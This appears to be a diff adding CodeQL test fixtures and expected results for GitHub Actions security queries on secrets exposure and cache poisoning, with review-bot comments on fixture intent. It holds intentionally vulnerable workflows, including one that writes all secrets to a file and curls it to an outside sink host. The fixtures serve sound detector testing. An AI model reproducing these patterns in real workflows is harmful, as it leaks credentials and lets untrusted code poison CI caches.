diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml new file mode 100644 index 000000000000..614efab34c98 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: list-actions-secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + strategy: + matrix: + TOKENS: [WRITE, READ] + steps: + - run: | + echo '${{ toJSON(secrets) }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + ALL_SECRETS: ${{ toJSON(secrets) }} + run: echo "$ALL_SECRETS" + - env: + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + run: echo "$SOME_SECRETS" + - env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected new file mode 100644 index 000000000000..9d6a741ed58f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected 
@@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] | diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref new file mode 100644 index 000000000000..45f5ad80fd98 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected new file mode 100644 index 000000000000..0acb306b9d6f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected 
@@ -0,0 +1,5 @@ +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref new file mode 100644 index 000000000000..c9bb538a12d3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/SecretsInArtifacts.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected new file mode 100644 index 000000000000..4f309344b4bc --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected 
@@ -0,0 +1,2 @@ +| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId | +| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref new file mode 100644 index 000000000000..ad4c84615237 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/UnmaskedSecretExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml new file mode 100644 index 000000000000..9f19634abc92 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml new file mode 100644 index 000000000000..9c87340d7ab6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml 
@@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml new file mode 100644 index 000000000000..55efe8e9fec9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml new file mode 100644 index 000000000000..eb6373a406eb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -0,0 +1,19 @@ +name: Cache Poisoning + +on: pull_request_target + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml new file mode 100644 index 000000000000..3849d92cbcca --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml new file mode 100644 index 000000000000..d3f51456de2d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml new file mode 100644 index 000000000000..ec0f9b0e6c94 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
new file mode 100644
index 000000000000..b9652d46b59f
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
@@ -0,0 +1,26 @@
+name: Test
+
+on:
+ pull_request_target:
+
+permissions:
+ actions: write
+
+jobs:
+ generate-results:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.10"
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ./results/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
new file mode 100644
index 000000000000..eba5e79229b4
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
@@ -0,0 +1,12 @@
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: write-all
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo ${{ github.event.comment.body }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
new file mode 100644
index 000000000000..72106b9d69b5
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
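Review bot: neg_code_injection1.yml is code_injection1.yml with `permissions: read-all` replaced by `permissions: write-all`, and it is the negative case, so the cache-poisoning-via-injection query evidently scopes itself to injections that run with a read-only token; presumably a write token makes the same `echo ${{ github.event.comment.body }}` the more severe plain code-injection finding instead, but neither file says so. A one-line comment on the permissions line would capture it: `permissions: write-all # NOT VULNERABLE here: with a write token this is reported by the code-injection query, not as cache poisoning`. Without it the pair invites someone to "fix" the negative fixture by dropping write-all and then wonder why the expected output changes.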
@@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml new file mode 100644 index 000000000000..31c820904cdb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml new file mode 100644 index 000000000000..f8e1dabf565c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml 
@@ -0,0 +1,35 @@
+name: Test
+
+on:
+ issue_comment:
+
+permissions:
+ actions: write
+
+jobs:
+ generate-results:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.10"
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+ - name: Download artifact
+ uses: actions/download-artifact@v4
+ with:
+ name: results
+ path: results/
+ - name: Upload results
+ uses: actions/upload-artifact@v4
+ with:
+ name: results
+ path: results/
+ if-no-files-found: ignore
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml
new file mode 100644
index 000000000000..9afe62d69da0
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml
@@ -0,0 +1,23 @@
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+
+ - uses: actions/checkout@v3
+ if: success()
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_sha }}
+
+ - uses: actions/cache@v2
+ with:
+ path: ~/.grade/caches/
+ key: poison_key
+ - run: |
+ cat poison
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml
new file mode 100644
index 000000000000..b39bc7a880f9
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml
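Review bot: `path: ~/.grade/caches/` in neg_direct_cache4.yml looks like a typo for `~/.gradle/caches/`; if the query recognises well-known tool cache directories by name, the misspelt path only exercises the generic "outside the checkout" branch, and if it does not, the name is merely confusing, so `path: ~/.gradle/caches/` is the fixture that was intended either way. It is also worth a comment that the case is negative only because no step between the untrusted checkout and `actions/cache` executes code from that checkout; adding a `./gradlew build` step before the cache step would let the PR author populate `~/.gradle/caches/` and turn this into a true positive. The trailing `cat poison` reads a file in the checkout, not in the cached path, so it does not affect the verdict.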
@@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml new file mode 100644 index 000000000000..e2c435af62de --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml new file mode 100644 index 000000000000..be1533f22312 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -0,0 +1,17 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml new file mode 100644 index 000000000000..05f8e4a067a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -0,0 +1,37 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison + + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml new file mode 100644 index 000000000000..60ba26406c62 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml 
@@ -0,0 +1,27 @@
+name: Test
+
+on:
+ # Runs on pull requests targeting the default branch
+ pull_request_target:
+ branches: ["main"]
+
+jobs:
+ build:
+ # Limit permissions of the GITHUB_TOKEN for untrusted code
+ permissions:
+ contents: read
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - name: Setup Pages
+ uses: actions/configure-pages@v5
+ - name: Build with Jekyll
+ uses: actions/jekyll-build-pages@v1
+ with:
+ source: ./
+ destination: ./_site
+
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
new file mode 100644
index 000000000000..8539bf2bda43
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
@@ -0,0 +1,19 @@
+name: Publish
+
+on:
+ pull_request_target:
+
+jobs:
+ build-and-upload:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+
+ - name: Checkout PR
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - run: npm run build -w www
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
new file mode 100644
index 000000000000..6e2351c17446
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
@@ -0,0 +1,18 @@
+name: OpenAPI
+on:
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+
+ openapi-base:
+ runs-on: ubuntu-latest
+ permissions: read-all
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./foo
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
new file mode 100644
index 000000000000..9742bd01a48a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
@@ -0,0 +1,28 @@
+name: Test
+on:
+ pull_request_target:
+ branches: ["main"]
+
+permissions:
+ contents: read
+ pages: write
+ id-token: write
+
+jobs:
+ build:
+ permissions:
+ contents: read
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - name: Setup Pages
+ uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5
+ - name: Build with Jekyll
+ uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1
+ with:
+ source: ./
+ destination: ./_site
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
new file mode 100644
index 000000000000..9cfac091f675
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
@@ -0,0 +1,10 @@
+edges
+| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | |
+nodes
+| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body |
+| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files |
+| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified |
+| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body |
+subpaths
+#select
+| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
new file mode 100644
index 000000000000..8ac48aad93e0
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
@@ -0,0 +1,2 @@
+Security/CWE-349/CachePoisoningViaCodeInjection.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
new file mode 100644
index 000000000000..4cc8536b5943
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -0,0 +1,52 @@
+edges
+| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step |
+| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step |
+| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step |
+| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step |
+| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step |
+| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step |
+| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step |
+| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step |
+| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step |
+| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step |
+| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step |
+| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step |
+| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step |
+| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step |
+| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip |
+| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step |
.github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step |
+| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step |
+| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step |
+| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step |
+| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip |
+| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step |
+| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step |
+| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step |
+| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step |
+| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step |
+|
.github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step |
+| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step |
+| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step |
+| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step |
+| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step |
